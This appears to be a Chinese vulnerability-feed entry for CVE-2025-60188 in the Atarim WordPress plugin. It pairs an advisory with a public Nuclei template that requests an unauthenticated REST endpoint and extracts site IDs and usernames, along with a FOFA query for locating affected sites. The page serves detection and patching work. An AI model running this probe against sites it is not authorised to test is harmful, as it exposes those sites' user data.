CVE-2025-60188: Atarim < 4.2.2 - Sensitive Information Exposure

日期: 2026-01-09 | 影响软件: Atarim | POC: 已公开

漏洞描述

Vito Peleg Atarim <= 4.2 contains an insertion of sensitive information into sent data vulnerability caused by improper handling of embedded sensitive data, letting attackers retrieve embedded sensitive data remotely, exploit requires no special privileges.

PoC代码[已公开]

id: CVE-2025-60188

info:
  name: Atarim < 4.2.2 - Sensitive Information Exposure
  author: m4hs_wacker
  severity: high
  description: |
    Vito Peleg Atarim <= 4.2 contains an insertion of sensitive information into sent data vulnerability caused by improper handling of embedded sensitive data, letting attackers retrieve embedded sensitive data remotely, exploit requires no special privileges.
  impact: |
    Attackers can retrieve embedded sensitive data, potentially leading to information disclosure.
  remediation: |
    Update to the latest version beyond 4.2.
  reference:
    - https://github.com/m4sh-wacker/CVE-2025-60188-Atarim-Plugin-Exploit
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="atarim"
  tags: cve,cve2025,wordpress,wp-plugin,atarim,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/atarim/v1/db/vc"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"wpf_site_id":"'
          - '"notify_user":'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: site_id
        part: body
        group: 1
        regex:
          - '"wpf_site_id":"([0-9]+)"'
        internal: true


      - type: regex
        name: username
        part: body
        group: 1
        regex:
          - '\\?"username\\?":\\?"([^"\\]+)'
        internal: true

      - type: dsl
        dsl:
          - '"username: "+ username'
          - '"Site_ID: "+ site_id'
# digest: 4b0a004830460221008c88d91acab7373f381dddd8373095d5c86eb8a7dcbcba7309f7940ffa060bb9022100e76f567f34ad822245a53db321eb73c25325e184fac1a67ba37b2a9ec49b3baa:922c64590222798bb761d5b6d8e72950

相关漏洞推荐